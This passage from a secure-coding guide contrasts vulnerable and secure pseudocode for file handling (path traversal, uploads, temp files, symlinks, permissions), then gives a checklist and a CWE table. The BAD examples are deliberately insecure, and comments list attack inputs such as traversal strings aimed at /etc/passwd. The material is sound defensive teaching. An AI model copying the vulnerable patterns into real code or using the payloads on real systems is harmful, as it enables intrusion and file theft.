errors.append({ + field: field, + message: "This field is required" + }) + ELSE IF field IN data: + value = data[field] + + // Type validation + IF NOT check_type(value, rules.type): + errors.append({ + field: field, + message: "Invalid value" // Don't say "expected integer" + }) + // Length validation + ELSE IF rules.max_length AND len(value) > rules.max_length: + errors.append({ + field: field, + message: "Value too long" + }) + END IF + END IF + END FOR + + IF errors.length > 0: + THROW ValidationError(errors) + END IF +END FUNCTION +``` + +--- + +## 10. File Handling + +**CWE References:** CWE-22 (Path Traversal), CWE-434 (Unrestricted Upload), CWE-377 (Insecure Temp File), CWE-59 (Symlink Following), CWE-732 (Incorrect Permission Assignment) +**Severity:** High to Critical | **Related:** [[File-Handling]] + +> **Risk:** File handling vulnerabilities enable attackers to read/write arbitrary files, execute malicious uploads, or escalate privileges through symlink attacks. AI-generated code frequently uses unsafe path concatenation and skips file validation entirely. + +### 10.1 Path Traversal Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Direct path concatenation allows traversal +// ======================================== +FUNCTION download_file_vulnerable(user_requested_filename): + // VULNERABLE: Attacker can request "../../etc/passwd" + file_path = "/var/app/uploads/" + user_requested_filename + + content = read_file(file_path) + RETURN content +END FUNCTION + +@route("/api/files/download") +FUNCTION handle_download_bad(request): + filename = request.query.filename + // No validation - attacker controls path + RETURN download_file_vulnerable(filename) +END FUNCTION + +// Attack examples: +// ?filename=../../etc/passwd -> reads /etc/passwd +// ?filename=....//....//etc/passwd -> bypasses simple ../ filters +// ?filename=..%2F..%2Fetc/passwd -> URL encoded traversal +// ?filename=/etc/passwd -> absolute path injection + +// ======================================== +// GOOD: Secure path handling with validation +// ======================================== +CONSTANT UPLOAD_DIR = "/var/app/uploads" + +FUNCTION download_file_secure(user_requested_filename): + // Step 1: Reject obviously malicious input + IF user_requested_filename IS NULL OR user_requested_filename == "": + THROW ValidationError("Filename required") + END IF + + // Step 2: Get only the base filename, reject path components + safe_filename = get_basename(user_requested_filename) + + // Step 3: Reject filenames that are empty after basename extraction + IF safe_filename == "" OR safe_filename == "." OR safe_filename == "..": + THROW ValidationError("Invalid filename") + END IF + + // Step 4: Build the full path + full_path = join_path(UPLOAD_DIR, safe_filename) + + // Step 5: Resolve to absolute path and verify it's within allowed directory + resolved_path = resolve_absolute_path(full_path) + + IF NOT resolved_path.starts_with(UPLOAD_DIR + "/"): + log.security("Path traversal attempt blocked", { + requested: user_requested_filename, + resolved: resolved_path + }) + THROW SecurityError("Access denied") + END IF + + // Step 6: Verify file exists and is a regular file (not directory/symlink) + IF NOT file_exists(resolved_path) OR NOT is_regular_file(resolved_path): + THROW NotFoundError("File not found") + END IF + + RETURN read_file(resolved_path) +END FUNCTION + +// Alternative: Use database lookups instead of filesystem paths +FUNCTION download_file_by_id(file_id): + // Validate file_id format (UUID) + IF NOT is_valid_uuid(file_id): + THROW ValidationError("Invalid file ID") + END IF + + // Look up file metadata in database + file_record = database.query( + "SELECT storage_path, original_name, owner_id FROM files WHERE id = ?", + [file_id] + ) + + IF file_record IS NULL: + THROW NotFoundError("File not found") + END IF + + // Verify ownership + IF file_record.owner_id != current_user.id: + THROW ForbiddenError("Access denied") + END IF + + // Storage path is server-controlled, not user input + RETURN read_file(file_record.storage_path) +END FUNCTION + +// Path validation helper +FUNCTION is_safe_path(base_dir, requested_path): + // Resolve both paths to absolute canonical form + base_resolved = resolve_canonical_path(base_dir) + full_resolved = resolve_canonical_path(join_path(base_dir, requested_path)) + + // Ensure resolved path is within base directory + RETURN full_resolved.starts_with(base_resolved + PATH_SEPARATOR) +END FUNCTION +``` + +### 10.2 Unrestricted File Uploads + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No validation on uploaded files +// ======================================== +@route("/api/upload") +FUNCTION upload_file_vulnerable(request): + uploaded_file = request.files.get("file") + + // VULNERABLE: Accepts any file type + filename = uploaded_file.filename + + // VULNERABLE: Uses user-provided filename directly + save_path = "/var/app/uploads/" + filename + + // VULNERABLE: No size limits + uploaded_file.save(save_path) + + // VULNERABLE: May be served with executable MIME type + RETURN {url: "/files/" + filename} +END FUNCTION + +// Attack scenarios: +// - Upload shell.php -> execute PHP code +// - Upload malicious.html -> stored XSS +// - Upload ../../../etc/cron.d/malicious -> write to system dirs +// - Upload huge file -> disk exhaustion DoS +// - Upload polyglot (valid image + embedded JS) -> bypass checks + +// ======================================== +// GOOD: Comprehensive upload validation +// ======================================== +CONSTANT ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx"} +CONSTANT ALLOWED_MIME_TYPES = { + "image/jpeg", "image/png", "image/gif", + "application/pdf", + "application/msword", + "application/vnd.openxmlformats-officedocument.wordprocessingml.document" +} +CONSTANT MAX_FILE_SIZE = 10 * 1024 * 1024 // 10 MB +CONSTANT UPLOAD_DIR = "/var/app/uploads" + +@route("/api/upload") +FUNCTION upload_file_secure(request): + uploaded_file = request.files.get("file") + + IF uploaded_file IS NULL: + RETURN error_response(400, "No file provided") + END IF + + // Step 1: Check file size BEFORE reading into memory + content_length = request.headers.get("Content-Length") + IF content_length IS NOT NULL AND int(content_length) > MAX_FILE_SIZE: + RETURN error_response(413, "File too large") + END IF + + // Step 2: Validate original filename extension + original_filename = uploaded_file.filename + extension = get_extension(original_filename).lower() + + IF extension NOT IN ALLOWED_EXTENSIONS: + log.warning("Rejected upload with extension", {extension: extension}) + RETURN error_response(400, "File type not allowed") + END IF + + // Step 3: Read file with size limit + file_content = uploaded_file.read(MAX_FILE_SIZE + 1) + + IF len(file_content) > MAX_FILE_SIZE: + RETURN error_response(413, "File too large") + END IF + + // Step 4: Validate MIME type from file content (magic bytes) + detected_mime = detect_mime_type(file_content) + + IF detected_mime NOT IN ALLOWED_MIME_TYPES: + log.warning("MIME type mismatch", { + claimed: uploaded_file.content_type, + detected: detected_mime + }) + RETURN error_response(400, "File type not allowed") + END IF + + // Step 5: For images, verify they parse correctly (anti-polyglot) + IF detected_mime.starts_with("image/"): + TRY: + image = parse_image(file_content) + // Re-encode to strip any embedded data + file_content = encode_image(image, format=extension) + CATCH ImageParseError: + RETURN error_response(400, "Invalid image file") + END TRY + END IF + + // Step 6: Generate random filename (never use user input) + random_name = generate_uuid() + "." + extension + save_path = join_path(UPLOAD_DIR, random_name) + + // Step 7: Save with restrictive permissions + write_file(save_path, file_content, permissions=0o644) + + // Step 8: Store metadata in database + file_id = database.insert("files", { + id: generate_uuid(), + storage_name: random_name, + original_name: sanitize_filename(original_filename), + mime_type: detected_mime, + size: len(file_content), + owner_id: current_user.id, + uploaded_at: current_timestamp() + }) + + log.info("File uploaded", {file_id: file_id, size: len(file_content)}) + + RETURN { + file_id: file_id, + // Serve through controlled endpoint, not direct file access + url: "/api/files/" + file_id + } +END FUNCTION + +// Serve uploaded files safely +@route("/api/files/{file_id}") +FUNCTION serve_file_secure(request, file_id): + file_record = database.get_file(file_id) + + IF file_record IS NULL OR file_record.owner_id != current_user.id: + RETURN error_response(404, "File not found") + END IF + + file_path = join_path(UPLOAD_DIR, file_record.storage_name) + content = read_file(file_path) + + RETURN response(200, content, headers={ + // Force download for non-image types + "Content-Disposition": "attachment; filename=\"" + + sanitize_header(file_record.original_name) + "\"", + // Prevent MIME sniffing + "X-Content-Type-Options": "nosniff", + // Strict content type + "Content-Type": file_record.mime_type + }) +END FUNCTION +``` + +### 10.3 Missing File Type Validation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Extension-only or no validation +// ======================================== +FUNCTION validate_image_bad(filename, file_content): + // VULNERABLE: Only checks extension, easily spoofed + extension = get_extension(filename).lower() + + IF extension IN ["jpg", "jpeg", "png", "gif"]: + RETURN TRUE // Attacker renames malware.exe to malware.jpg + END IF + + RETURN FALSE +END FUNCTION + +FUNCTION validate_mime_header_bad(file_content): + // VULNERABLE: Only checks claimed MIME type header + mime = request.headers.get("Content-Type") + + IF mime.starts_with("image/"): + RETURN TRUE // Attacker sets Content-Type: image/png for shell.php + END IF + + RETURN FALSE +END FUNCTION + +// ======================================== +// GOOD: Multi-layer file type validation +// ======================================== + +// Magic bytes signatures for common file types +MAGIC_SIGNATURES = { + "jpg": [0xFF, 0xD8, 0xFF], + "png": [0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A], + "gif": [0x47, 0x49, 0x46, 0x38], // GIF8 + "pdf": [0x25, 0x50, 0x44, 0x46], // %PDF + "zip": [0x50, 0x4B, 0x03, 0x04], + "docx": [0x50, 0x4B, 0x03, 0x04], // DOCX is ZIP-based +} + +FUNCTION validate_file_type(filename, file_content, allowed_types): + // Layer 1: Extension validation + extension = get_extension(filename).lower() + + IF extension NOT IN allowed_types: + RETURN {valid: FALSE, reason: "Extension not allowed"} + END IF + + // Layer 2: Magic bytes validation + detected_type = detect_type_by_magic(file_content) + + IF detected_type IS NULL: + RETURN {valid: FALSE, reason: "Unknown file type"} + END IF + + IF detected_type NOT IN allowed_types: + RETURN {valid: FALSE, reason: "Content type not allowed"} + END IF + + // Layer 3: Extension matches content + IF NOT extension_matches_content(extension, detected_type): + RETURN {valid: FALSE, reason: "Extension does not match content"} + END IF + + // Layer 4: For specific types, deep validation + IF detected_type IN ["jpg", "jpeg", "png", "gif"]: + IF NOT validate_image_structure(file_content): + RETURN {valid: FALSE, reason: "Invalid image structure"} + END IF + ELSE IF detected_type == "pdf": + IF NOT validate_pdf_safe(file_content): + RETURN {valid: FALSE, reason: "PDF contains unsafe content"} + END IF + ELSE IF detected_type IN ["docx", "xlsx"]: + IF NOT validate_office_safe(file_content): + RETURN {valid: FALSE, reason: "Document contains macros"} + END IF + END IF + + RETURN {valid: TRUE, detected_type: detected_type} +END FUNCTION + +FUNCTION detect_type_by_magic(file_content): + IF len(file_content) < 8: + RETURN NULL + END IF + + header = file_content[0:8] + + FOR type_name, signature IN MAGIC_SIGNATURES: + IF header.starts_with(bytes(signature)): + RETURN type_name + END IF + END FOR + + RETURN NULL +END FUNCTION + +FUNCTION validate_image_structure(file_content): + TRY: + // Use secure image library to parse + image = image_library.decode(file_content) + + // Check for reasonable dimensions (anti-DoS) + IF image.width > 10000 OR image.height > 10000: + RETURN FALSE + END IF + + // Check pixel count (decompression bomb protection) + IF image.width * image.height > 100000000: // 100 megapixels + RETURN FALSE + END IF + + RETURN TRUE + + CATCH ImageDecodeError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION validate_pdf_safe(file_content): + TRY: + pdf = pdf_library.parse(file_content) + + // Check for JavaScript (often used in attacks) + IF pdf.contains_javascript(): + RETURN FALSE + END IF + + // Check for embedded files + IF pdf.has_embedded_files(): + RETURN FALSE + END IF + + // Check for form actions pointing to URLs + IF pdf.has_external_actions(): + RETURN FALSE + END IF + + RETURN TRUE + + CATCH PDFParseError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION validate_office_safe(file_content): + TRY: + // Office files are ZIP archives + archive = zip_library.open(file_content) + + // Check for macro-enabled formats + FOR entry IN archive.entries(): + IF entry.name.contains("vbaProject") OR entry.name.ends_with(".bin"): + RETURN FALSE // Contains macros + END IF + END FOR + + RETURN TRUE + + CATCH ZipError: + RETURN FALSE + END TRY +END FUNCTION +``` + +### 10.4 Insecure Temporary File Handling + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Predictable or insecure temp files +// ======================================== + +// Mistake 1: Predictable filename +FUNCTION create_temp_bad_predictable(data): + // VULNERABLE: Attacker can predict and pre-create file + temp_path = "/tmp/myapp_" + current_user.id + ".tmp" + + // Race condition: attacker creates symlink before this + write_file(temp_path, data) + + RETURN temp_path +END FUNCTION + +// Mistake 2: World-readable permissions +FUNCTION create_temp_bad_permissions(data): + temp_path = "/tmp/myapp_" + random_string(8) + ".tmp" + + // VULNERABLE: Default permissions may be world-readable (0644) + write_file(temp_path, data) // Other users can read + + RETURN temp_path +END FUNCTION + +// Mistake 3: Not cleaning up +FUNCTION process_upload_bad_cleanup(uploaded_data): + temp_path = "/tmp/upload_" + generate_uuid() + write_file(temp_path, uploaded_data) + + TRY: + result = process_file(temp_path) + // VULNERABLE: Temp file remains on disk if exception occurs elsewhere + RETURN result + CATCH Error as e: + // Temp file leaked! + THROW e + END TRY +END FUNCTION + +// Mistake 4: Using system temp without isolation +FUNCTION create_temp_bad_shared(data): + // VULNERABLE: Shared /tmp can be accessed by other users/processes + temp_path = temp_directory() + "/" + random_string(8) + write_file(temp_path, data) + RETURN temp_path +END FUNCTION + +// ======================================== +// GOOD: Secure temporary file handling +// ======================================== + +// Use language's secure temp file creation +FUNCTION create_temp_secure(data, suffix=".tmp"): + // mkstemp equivalent: creates file with random name and 0600 permissions + temp_file = create_secure_temp_file( + prefix="myapp_", + suffix=suffix, + dir="/var/app/tmp" // App-specific temp directory + ) + + // Write data to already-open file handle (no race condition) + temp_file.write(data) + temp_file.flush() + + RETURN temp_file +END FUNCTION + +// Process with guaranteed cleanup +FUNCTION process_upload_secure(uploaded_data): + temp_file = NULL + + TRY: + // Create secure temp file + temp_file = create_secure_temp_file( + prefix="upload_", + suffix=get_safe_extension(uploaded_data.filename), + dir=APPLICATION_TEMP_DIR + ) + + // Write with explicit permissions + temp_file.write(uploaded_data.content) + temp_file.flush() + + // Process the file + result = process_file(temp_file.path) + + RETURN result + + FINALLY: + // Always clean up, even on exception + IF temp_file IS NOT NULL: + TRY: + temp_file.close() + delete_file(temp_file.path) + CATCH: + log.warning("Failed to clean up temp file", {path: temp_file.path}) + END TRY + END IF + END TRY +END FUNCTION + +// Context manager pattern for automatic cleanup +FUNCTION with_temp_file(data, callback): + temp_file = create_secure_temp_file(prefix="ctx_") + + TRY: + temp_file.write(data) + temp_file.flush() + + RETURN callback(temp_file.path) + + FINALLY: + temp_file.close() + secure_delete(temp_file.path) // Overwrite before delete for sensitive data + END TRY +END FUNCTION + +// Usage: +result = with_temp_file(sensitive_data, FUNCTION(path): + RETURN external_processor.process(path) +END FUNCTION) + +// Secure temp directory per-request +FUNCTION create_temp_directory_secure(): + // Create directory with random name and 0700 permissions + temp_dir = create_secure_temp_directory( + prefix="session_", + dir=APPLICATION_TEMP_DIR + ) + + // Set restrictive permissions + set_permissions(temp_dir, 0o700) + + RETURN temp_dir +END FUNCTION + +// Application startup: ensure temp directory security +FUNCTION initialize_temp_directory(): + temp_dir = APPLICATION_TEMP_DIR + + // Create if doesn't exist + IF NOT directory_exists(temp_dir): + create_directory(temp_dir, permissions=0o700) + END IF + + // Verify permissions + current_perms = get_permissions(temp_dir) + IF current_perms != 0o700: + set_permissions(temp_dir, 0o700) + END IF + + // Verify ownership + IF get_owner(temp_dir) != get_current_user(): + THROW SecurityError("Temp directory has incorrect ownership") + END IF + + // Clean up old temp files on startup + cleanup_old_temp_files(temp_dir, max_age_hours=24) +END FUNCTION + +// Secure delete for sensitive data +FUNCTION secure_delete(file_path): + IF file_exists(file_path): + // Overwrite with random data before deletion + file_size = get_file_size(file_path) + random_data = crypto.random_bytes(file_size) + write_file(file_path, random_data) + sync_to_disk(file_path) + + // Now delete + delete_file(file_path) + END IF +END FUNCTION +``` + +### 10.5 Symlink Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Following symlinks without validation +// ======================================== +FUNCTION read_user_file_vulnerable(user_id, filename): + user_dir = "/var/app/users/" + user_id + file_path = user_dir + "/" + filename + + // VULNERABLE: If filename is symlink to /etc/passwd, reads it + IF file_exists(file_path): + RETURN read_file(file_path) + END IF + + RETURN NULL +END FUNCTION + +FUNCTION delete_file_vulnerable(user_id, filename): + user_dir = "/var/app/users/" + user_id + file_path = user_dir + "/" + filename + + // VULNERABLE: Attacker creates symlink to critical file + // Symlink: /var/app/users/123/data -> /etc/passwd + // delete_file follows the symlink and deletes /etc/passwd + delete_file(file_path) +END FUNCTION + +// TOCTOU (Time of Check to Time of Use) vulnerability +FUNCTION process_file_toctou(file_path): + // Check if file is safe + IF is_symlink(file_path): + THROW SecurityError("Symlinks not allowed") + END IF + + // VULNERABLE: Race condition between check and use + // Attacker replaces regular file with symlink here + + // Process the file (now following attacker's symlink) + content = read_file(file_path) + RETURN process_content(content) +END FUNCTION + +// ======================================== +// GOOD: Safe symlink handling +// ======================================== + +// Option 1: Reject symlinks entirely +FUNCTION read_user_file_no_symlinks(user_id, filename): + user_dir = "/var/app/users/" + user_id + + // Validate filename + IF NOT is_safe_filename(filename): + THROW ValidationError("Invalid filename") + END IF + + file_path = join_path(user_dir, filename) + + // Use lstat to check WITHOUT following symlinks + file_stat = lstat(file_path) // NOT stat() + + IF file_stat IS NULL: + THROW NotFoundError("File not found") + END IF + + // Reject if symlink + IF file_stat.is_symlink: + log.security("Symlink access blocked", {path: file_path}) + THROW SecurityError("Access denied") + END IF + + // Reject if not regular file + IF NOT file_stat.is_regular_file: + THROW ValidationError("Not a regular file") + END IF + + // Use O_NOFOLLOW flag when opening + file_handle = open_file(file_path, flags=O_RDONLY | O_NOFOLLOW) + content = file_handle.read() + file_handle.close() + + RETURN content +END FUNCTION + +// Option 2: Resolve and validate path before access +FUNCTION read_file_resolved(base_dir, relative_path): + // Get the real path resolving all symlinks + requested_path = join_path(base_dir, relative_path) + real_path = realpath(requested_path) + + // Verify real path is within allowed base directory + real_base = realpath(base_dir) + + IF NOT real_path.starts_with(real_base + "/"): + log.security("Path escape via symlink", { + requested: requested_path, + resolved: real_path, + base: real_base + }) + THROW SecurityError("Access denied") + END IF + + RETURN read_file(real_path) +END FUNCTION + +// Option 3: Atomic operations to prevent TOCTOU +FUNCTION process_file_atomic(file_path): + // Open with O_NOFOLLOW - fails if symlink + TRY: + file_handle = open_file(file_path, flags=O_RDONLY | O_NOFOLLOW) + CATCH SymlinkError: + THROW SecurityError("Symlinks not allowed") + END TRY + + // fstat the open handle, not the path (prevents TOCTOU) + file_stat = fstat(file_handle) + + // Verify it's still a regular file + IF NOT file_stat.is_regular_file: + file_handle.close() + THROW ValidationError("Not a regular file") + END IF + + // Read from the verified handle + content = file_handle.read() + file_handle.close() + + RETURN process_content(content) +END FUNCTION + +// Safe file writing with symlink protection +FUNCTION write_file_safe(directory, filename, content): + // Validate filename + IF NOT is_safe_filename(filename): + THROW ValidationError("Invalid filename") + END IF + + file_path = join_path(directory, filename) + + // Check if path already exists + existing_stat = lstat(file_path) + + IF existing_stat IS NOT NULL: + IF existing_stat.is_symlink: + THROW SecurityError("Cannot overwrite symlink") + END IF + END IF + + // Open with O_CREAT | O_EXCL to fail if exists (then retry with O_TRUNC) + // Or use O_NOFOLLOW if supported for writing + TRY: + // Write to temp file first, then atomic rename + temp_path = join_path(directory, "." + generate_uuid() + ".tmp") + + file_handle = open_file(temp_path, + flags=O_WRONLY | O_CREAT | O_EXCL, + permissions=0o644 + ) + file_handle.write(content) + file_handle.flush() + file_handle.close() + + // Atomic rename (on same filesystem) + rename_file(temp_path, file_path) + + CATCH FileExistsError: + // Handle race condition + THROW ConcurrencyError("File creation conflict") + END TRY +END FUNCTION + +// Directory traversal with symlink safety +FUNCTION list_directory_safe(dir_path): + real_dir = realpath(dir_path) + entries = [] + + FOR entry IN list_directory(real_dir): + entry_path = join_path(real_dir, entry.name) + entry_stat = lstat(entry_path) // Don't follow symlinks + + entry_info = { + name: entry.name, + is_file: entry_stat.is_regular_file, + is_dir: entry_stat.is_directory, + is_symlink: entry_stat.is_symlink, + size: entry_stat.size IF entry_stat.is_regular_file ELSE 0 + } + + // Optionally resolve symlink target for display + IF entry_stat.is_symlink: + entry_info.symlink_target = readlink(entry_path) + // Check if symlink points outside directory + real_target = realpath(entry_path) + entry_info.safe = real_target.starts_with(real_dir + "/") + END IF + + entries.append(entry_info) + END FOR + + RETURN entries +END FUNCTION +``` + +### 10.6 Unsafe File Permissions + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Overly permissive file permissions +// ======================================== + +// Mistake 1: World-readable sensitive files +FUNCTION save_config_bad(config_data): + // VULNERABLE: Default umask may create 0644 (world-readable) + write_file("/etc/myapp/config.json", json_encode(config_data)) + // Config contains database passwords, API keys, etc. +END FUNCTION + +// Mistake 2: World-writable files +FUNCTION create_log_bad(): + log_path = "/var/log/myapp/app.log" + + // VULNERABLE: 0666 allows any user to modify logs + write_file(log_path, "", permissions=0o666) +END FUNCTION + +// Mistake 3: Executable when shouldn't be +FUNCTION save_upload_bad(content, filename): + path = "/var/app/uploads/" + filename + + // VULNERABLE: 0755 makes file executable + write_file(path, content, permissions=0o755) + // Attacker uploads shell script and executes it +END FUNCTION + +// Mistake 4: Directory permissions too open +FUNCTION create_user_dir_bad(user_id): + dir_path = "/var/app/users/" + user_id + + // VULNERABLE: 0777 allows anyone to read/write/traverse + create_directory(dir_path, permissions=0o777) +END FUNCTION + +// Mistake 5: Not checking permissions on read +FUNCTION load_config_bad(): + config_path = "/etc/myapp/secrets.json" + + // VULNERABLE: Loads config without verifying it hasn't been tampered + RETURN json_decode(read_file(config_path)) +END FUNCTION + +// ======================================== +// GOOD: Secure file permissions +// ======================================== + +// Permission constants +CONSTANT PERM_OWNER_ONLY = 0o600 // -rw------- +CONSTANT PERM_OWNER_READ_ONLY = 0o400 // -r-------- +CONSTANT PERM_STANDARD_FILE = 0o644 // -rw-r--r-- +CONSTANT PERM_PRIVATE_DIR = 0o700 // drwx------ +CONSTANT PERM_STANDARD_DIR = 0o755 // drwxr-xr-x + +FUNCTION save_sensitive_config(config_data): + config_path = "/etc/myapp/secrets.json" + + // Set restrictive umask for this operation + old_umask = set_umask(0o077) + + TRY: + // Write to temp file first + temp_path = config_path + ".tmp" + write_file(temp_path, json_encode(config_data)) + + // Explicitly set permissions (don't rely on umask) + set_permissions(temp_path, PERM_OWNER_ONLY) + + // Set ownership to service account + set_owner(temp_path, "myapp", "myapp") + + // Atomic rename + rename_file(temp_path, config_path) + + FINALLY: + // Restore umask + set_umask(old_umask) + END TRY +END FUNCTION + +FUNCTION create_log_secure(): + log_dir = "/var/log/myapp" + log_path = log_dir + "/app.log" + + // Ensure directory exists with correct permissions + IF NOT directory_exists(log_dir): + create_directory(log_dir, permissions=PERM_STANDARD_DIR) + set_owner(log_dir, "myapp", "myapp") + END IF + + // Create log file with appropriate permissions + // 0640 = owner read/write, group read, others none + IF NOT file_exists(log_path): + write_file(log_path, "", permissions=0o640) + set_owner(log_path, "myapp", "adm") // adm group can read logs + END IF +END FUNCTION + +FUNCTION save_upload_secure(content, filename, user_id): + uploads_dir = "/var/app/uploads" + user_dir = join_path(uploads_dir, user_id) + + // Ensure user directory exists + IF NOT directory_exists(user_dir): + create_directory(user_dir, permissions=PERM_PRIVATE_DIR) + END IF + + // Generate safe filename + safe_name = generate_uuid() + get_safe_extension(filename) + file_path = join_path(user_dir, safe_name) + + // Save with NO execute permission, owner read/write only + write_file(file_path, content, permissions=PERM_OWNER_ONLY) + + RETURN file_path +END FUNCTION + +FUNCTION load_config_secure(config_path): + // Verify file exists + IF NOT file_exists(config_path): + THROW ConfigError("Config file not found") + END IF + + // Check permissions before loading + file_stat = stat(config_path) + + // Reject if world-readable or world-writable + IF file_stat.mode & 0o004: // World readable + THROW SecurityError("Config file is world-readable") + END IF + + IF file_stat.mode & 0o002: // World writable + THROW SecurityError("Config file is world-writable") + END IF + + // Verify ownership + expected_owner = get_service_user() + IF file_stat.owner != expected_owner: + THROW SecurityError("Config file has incorrect ownership") + END IF + + // Safe to load + RETURN json_decode(read_file(config_path)) +END FUNCTION + +// Verify and fix permissions on startup +FUNCTION verify_file_permissions(): + critical_files = [ + {path: "/etc/myapp/secrets.json", expected: 0o600, type: "file"}, + {path: "/etc/myapp", expected: 0o700, type: "directory"}, + {path: "/var/app/private", expected: 0o700, type: "directory"}, + {path: "/var/app/uploads", expected: 0o755, type: "directory"} + ] + + FOR item IN critical_files: + IF NOT exists(item.path): + log.warning("Missing path", {path: item.path}) + CONTINUE + END IF + + current_stat = stat(item.path) + current_mode = current_stat.mode & 0o777 // Permission bits only + + IF current_mode != item.expected: + log.warning("Fixing permissions", { + path: item.path, + current: format_octal(current_mode), + expected: format_octal(item.expected) + }) + set_permissions(item.path, item.expected) + END IF + + // Check for world-writable + IF current_mode & 0o002: + log.error("World-writable file detected", {path: item.path}) + THROW SecurityError("Critical file is world-writable: " + item.path) + END IF + END FOR + + log.info("File permissions verified") +END FUNCTION + +// Secure file copy +FUNCTION copy_file_secure(source, destination, preserve_permissions=FALSE): + // Read source + source_stat = stat(source) + + IF source_stat.is_symlink: + THROW SecurityError("Cannot copy symlinks") + END IF + + content = read_file(source) + + // Determine permissions for destination + IF preserve_permissions: + dest_perms = source_stat.mode & 0o777 + // But never preserve world-writable + dest_perms = dest_perms & ~0o002 + ELSE: + // Default to secure permissions + dest_perms = PERM_OWNER_ONLY + END IF + + // Write with explicit permissions + write_file(destination, content, permissions=dest_perms) +END FUNCTION +``` + +--- + +## Pre-Generation Security Checklist + +**Before generating ANY code, verify these critical security requirements:** + +### ✓ Secrets & Credentials +- [ ] No hardcoded API keys, passwords, tokens, or secrets +- [ ] Credentials loaded from environment variables or secret managers +- [ ] No secrets in client-side/frontend code +- [ ] Git history checked for accidentally committed secrets + +### ✓ Input Handling +- [ ] All user input validated on the SERVER side +- [ ] Input type, length, and format constraints enforced +- [ ] Database queries use parameterized/prepared statements +- [ ] Shell commands use argument arrays, not string concatenation +- [ ] File paths validated and canonicalized before use + +### ✓ Output Encoding +- [ ] HTML output properly encoded to prevent XSS +- [ ] Context-appropriate encoding (HTML, URL, JS, CSS) +- [ ] Content-Security-Policy header configured +- [ ] Error messages don't expose internal details + +### ✓ Authentication & Sessions +- [ ] Passwords hashed with bcrypt/Argon2 (not MD5/SHA1) +- [ ] Session tokens generated with cryptographically secure randomness +- [ ] Session IDs regenerated on authentication state changes +- [ ] Rate limiting on authentication endpoints +- [ ] JWT tokens use strong secrets and explicit algorithms + +### ✓ Cryptography +- [ ] Modern algorithms only (AES-GCM, ChaCha20-Poly1305) +- [ ] Keys from environment/secret manager, not hardcoded +- [ ] Unique IVs/nonces for each encryption operation +- [ ] Key derivation uses PBKDF2/Argon2/scrypt + +### ✓ File Operations +- [ ] File uploads validate extension, MIME type, and magic bytes +- [ ] File size limits enforced +- [ ] Uploaded files stored outside web root +- [ ] Path traversal prevented with basename + realpath validation +- [ ] Temp files use mkstemp with restrictive permissions + +### ✓ API Security +- [ ] All endpoints require authentication (unless explicitly public) +- [ ] Object-level authorization verified (ownership checks) +- [ ] Response DTOs with explicit field allowlists +- [ ] Rate limiting applied to prevent abuse +- [ ] Error responses use standard format without internal details + +### ✓ Dependencies +- [ ] Package names verified to exist before importing +- [ ] Dependencies pinned to exact versions with lockfiles +- [ ] No packages with known vulnerabilities +- [ ] Transitive dependencies reviewed + +### ✓ Configuration +- [ ] Debug mode disabled in production +- [ ] Default credentials replaced with strong values +- [ ] Security headers configured (CSP, HSTS, X-Frame-Options) +- [ ] CORS restricted to known origins +- [ ] Admin interfaces protected with additional authentication + +--- + +## External References + +### OWASP Resources +- **OWASP Top 10 (2021):** https://owasp.org/Top10/ +- **OWASP ASVS:** https://owasp.org/www-project-application-security-verification-standard/ +- **OWASP Cheat Sheet Series:** https://cheatsheetseries.owasp.org/ +- **OWASP Testing Guide:** https://owasp.org/www-project-web-security-testing-guide/ + +### CWE (Common Weakness Enumeration) +- **CWE Database:** https://cwe.mitre.org/ +- **CWE Top 25 (2024):** https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html + +### CWE References in This Document +| CWE ID | Name | Sections | +|--------|------|----------| +| CWE-16 | Configuration | 7.5 | +| CWE-20 | Improper Input Validation | 6.1-6.6 | +| CWE-22 | Path Traversal | 6.6, 10.1 | +| CWE-59 | Symlink Following | 10.5 | +| CWE-78 | OS Command Injection | 2.2 | +| CWE-79 | Cross-site Scripting (XSS) | 3.1-3.5 | +| CWE-80 | Basic XSS | 3.1-3.5 | +| CWE-89 | SQL Injection | 2.1 | +| CWE-90 | LDAP Injection | 2.3 | +| CWE-117 | Log Injection | Quick Reference | +| CWE-180 | Incorrect Canonicalization | 6.6 | +| CWE-200 | Information Exposure | 9.4 | +| CWE-209 | Error Message Information Exposure | 7.2, 9.6 | +| CWE-215 | Information Exposure Through Debug | 7.1 | +| CWE-259 | Hard-coded Password | 1.1-1.5 | +| CWE-284 | Improper Access Control | 9.1 | +| CWE-287 | Improper Authentication | 4.1-4.7, 9.1 | +| CWE-307 | Brute Force | 4.2 | +| CWE-326 | Inadequate Encryption Strength | 5.1 | +| CWE-327 | Use of Broken Crypto Algorithm | 5.1 | +| CWE-328 | Weak Hash | 5.1 | +| CWE-330 | Insufficient Randomness | 5.6 | +| CWE-346 | Origin Validation Error (CORS) | 7.4 | +| CWE-377 | Insecure Temporary File | 10.4 | +| CWE-384 | Session Fixation | 4.4 | +| CWE-434 | Unrestricted File Upload | 10.2 | +| CWE-494 | Download Without Integrity Check | 8.5 | +| CWE-521 | Weak Password Requirements | 4.1 | +| CWE-613 | Insufficient Session Expiration | 4.4 | +| CWE-639 | Insecure Direct Object Reference | 9.2 | +| CWE-643 | XPath Injection | 2.4 | +| CWE-732 | Incorrect Permission Assignment | 10.6 | +| CWE-759 | Use of One-Way Hash without Salt | 5.7 | +| CWE-770 | Resource Exhaustion (Rate Limiting) | 9.5 | +| CWE-798 | Hard-coded Credentials | 1.1-1.5 | +| CWE-829 | Inclusion of Untrusted Functionality | 8.4 | +| CWE-915 | Mass Assignment | 9.3 | +| CWE-943 | NoSQL Injection | 2.5 | +| CWE-1104 | Use of Unmaintained Components | 8.1 | +| CWE-1284 | Improper Validation of Array Index | 6.3 | +| CWE-1333 | ReDoS | 6.4 | +| CWE-1336 | Template Injection | 2.6 | +| CWE-1357 | Reliance on Insufficiently Trustworthy Component | 